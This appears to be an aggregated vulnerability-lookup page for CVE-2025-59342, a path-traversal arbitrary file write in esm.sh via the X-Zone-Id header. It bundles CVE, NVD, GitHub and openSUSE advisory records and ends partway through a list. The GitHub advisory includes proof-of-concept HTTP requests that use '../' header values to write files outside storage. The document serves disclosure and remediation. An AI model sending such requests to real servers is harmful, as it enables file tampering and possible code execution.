CVE-2025-59342 (GCVE-0-2025-59342)
Vulnerability from cvelistv5 – Published: 2025-09-17 17:59 – Updated: 2026-01-14 15:52 – CWE-24 - Path Traversal: '../filedir'
| URL | Tags |
|---|---|
| https://github.com/esm-dev/esm.sh/security/adviso… | x_refsource_CONFIRM |
| https://github.com/esm-dev/esm.sh/commit/833a29f4… | x_refsource_MISC |
| https://github.com/esm-dev/esm.sh/blob/main/serve… | x_refsource_MISC |
| https://github.com/esm-dev/esm.sh/blob/main/serve… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-59342",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-17T18:19:55.260782Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-17T18:20:28.195Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "esm.sh",
"vendor": "esm-dev",
"versions": [
{
"status": "affected",
"version": "\u003c= 136"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-24",
"description": "CWE-24: Path Traversal: \u0027../filedir\u0027",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T15:52:09.174Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
},
{
"name": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"name": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"name": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
}
],
"source": {
"advisory": "GHSA-g2h5-cvvr-7gmw",
"discovery": "UNKNOWN"
},
"title": "esm.sh writes arbitrary files via path traversal in `X-Zone-Id` header"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-59342",
"datePublished": "2025-09-17T17:59:34.163Z",
"dateReserved": "2025-09-12T12:36:24.636Z",
"dateUpdated": "2026-01-14T15:52:09.174Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-59342",
"date": "2026-05-27",
"epss": "0.06448",
"percentile": "0.91182"
}
}
}
FKIE_CVE-2025-59342
Vulnerability from fkie_nvd - Published: 2025-09-17 18:15 - Updated: 2026-04-15 00:35
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories. Version 136.1 contains a patch."
},
{
"lang": "es",
"value": "esm.sh es una red de entrega de contenido (CDN) sin compilaci\u00f3n para el desarrollo web moderno. En 136 y anteriores, una falla de path traversal en el manejo del encabezado HTTP X-Zone-Id permite a un atacante hacer que la aplicaci\u00f3n escriba archivos fuera de la ubicaci\u00f3n de almacenamiento prevista. El valor del encabezado se utiliza para construir una ruta del sistema de archivos, pero no se canonicaliza correctamente ni se restringe al directorio base de almacenamiento de la aplicaci\u00f3n. Como resultado, suministrar secuencias ../ en X-Zone-Id hace que los archivos se escriban en directorios arbitrarios."
}
],
"id": "CVE-2025-59342",
"lastModified": "2026-04-15T00:35:42.020",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-09-17T18:15:53.550",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-24"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-G2H5-CVVR-7GMW
Vulnerability from github – Published: 2025-09-17 19:03 – Updated: 2026-01-14 15:51
Summary
A path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories (example observed: ~/.esmd/modules/transform/<id>/ instead of ~/.esmd/storage/modules/transform).
Severity: Medium
Component / Endpoint:
POST /transform — handling of X-Zone-Id header
The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411
Impact: Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.
Proof of Concept (POC)
Request (attacker-supplied X-Zone-Id contains path traversal):
POST /transform HTTP/1.1
Host: localhost:8888
User-Agent: Den/8.7.1
Accept: */*
Connection: keep-alive
Referer: http://localhost:9999/
Content-Type: application/json
X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/
Content-Length: 325
{
"filename": "example2.js",
"lang": "js",
"code": "console.log('hello');",
"importMap": {
"imports": {
"react": "https://esm.sh/react",
"react-dom": "https://esm.sh/react-dom"
}
},
"jsxImportSource": "react",
"target": "es2022",
"sourceMap": "external",
"minify": true
}
Observed result: file written to ~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js instead of the intended ~/.esmd/storage/modules/transform/.
This can also be triggered with another path-traversal request, shown below:
GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1
Host: localhost:8888
User-Agent: localhost
Accept: */*
Connection: keep-alive
X-Zone-Id: ../
Referer: http://localhost:9999/
Remediation
Simply remove any `..` in the X-Zone-Id header before actually processing the file.
Credits
- [Ai Ho (Jessie)](https://github.com/j3ssie)
- [CL Yang](https://github.com/A11riseforme)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 136"
},
"package": {
"ecosystem": "Go",
"name": "github.com/esm-dev/esm.sh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "136.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59342"
],
"database_specific": {
"cwe_ids": [
"CWE-24"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-17T19:03:05Z",
"nvd_published_at": "2025-09-17T18:15:53Z",
"severity": "MODERATE"
},
"id": "GHSA-g2h5-cvvr-7gmw",
"modified": "2026-01-14T15:51:07Z",
"published": "2025-09-17T19:03:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59342"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
},
{
"type": "PACKAGE",
"url": "https://github.com/esm-dev/esm.sh"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
},
{
"type": "WEB",
"url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3967"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header"
}
OPENSUSE-SU-2025:15576-1
Vulnerability from csaf_opensuse - Published: 2025-09-25 00:00 - Updated: 2025-09-25 00:00
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x | — | | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 | — | | Vendor Fix |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250924T192141-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15576",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15576-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-10630 page",
"url": "https://www.suse.com/security/cve/CVE-2025-10630/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59342 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59342/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59352 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59352/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59353 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59353/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59354 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59354/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59410 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59410/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9081/"
}
],
"title": "govulncheck-vulndb-0.0.20250924T192141-1.1 on GA media",
"tracking": {
"current_release_date": "2025-09-25T00:00:00Z",
"generator": {
"date": "2025-09-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15576-1",
"initial_release_date": "2025-09-25T00:00:00Z",
"revision_history": [
{
"date": "2025-09-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-10630",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-10630"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. Grafana-Zabbix is a plugin for Grafana that allows visualizing monitoring data from Zabbix and creating dashboards for analyzing metrics and realtime monitoring. Versions 5.2.1 and below contained a ReDoS vulnerability via a user-supplied regex query which could cause CPU usage to max out. This vulnerability is fixed in version 6.0.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-10630",
"url": "https://www.suse.com/security/cve/CVE-2025-10630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-10630"
},
{
"cve": "CVE-2025-59341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59341"
}
],
"notes": [
{
"category": "general",
"text": "esm.sh is a nobuild content delivery network (CDN) for modern web development. In 136 and earlier, a Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59341",
"url": "https://www.suse.com/security/cve/CVE-2025-59341"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59341"
},
{
"cve": "CVE-2025-59342",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59342"
}
],
"notes": [
{
"category": "general",
"text": "esm.sh is a nobuild content delivery network (CDN) for modern web development. In 136 and earlier, a path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u0027s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59342",
"url": "https://www.suse.com/security/cve/CVE-2025-59342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-59342"
},
{
"cve": "CVE-2025-59345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59345"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Prior to 2.1.0, the /api/v1/jobs and /preheats endpoints in the Manager web UI are accessible without authentication. Any user with network access to the Manager can create, delete, and modify jobs, and create preheat jobs. An unauthenticated adversary with network access to a Manager web UI uses the /api/v1/jobs endpoint to create hundreds of useless jobs. The Manager is in a denial-of-service state, and stops accepting requests from valid administrators. This vulnerability is fixed in 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59345",
"url": "https://www.suse.com/security/cve/CVE-2025-59345"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59345"
},
{
"cve": "CVE-2025-59346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59346"
}
],
"notes": [
{
"category": "general",
"text": "Dragonfly is an open source P2P-based file distribution and image acceleration system. Versions prior to 2.1.0 contain a server-side request forgery (SSRF) vulnerability that enables users to force DragonFly2\u0027s components to make requests to internal services that are otherwise not accessible to them. The issue arises because the Manager API accepts a user-supplied URL when creating a Preheat job with weak validation, peers can trigger other peers to fetch an arbitrary URL through pieceManager.DownloadSource, and internal HTTP clients follow redirects, allowing a request to a malicious server to be redirected to internal services. This can be used to probe or access internal HTTP endpoints. The vulnerability is fixed in version 2.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59346",
"url": "https://www.suse.com/security/cve/CVE-2025-59346"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250924T192141-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59346"
},
{
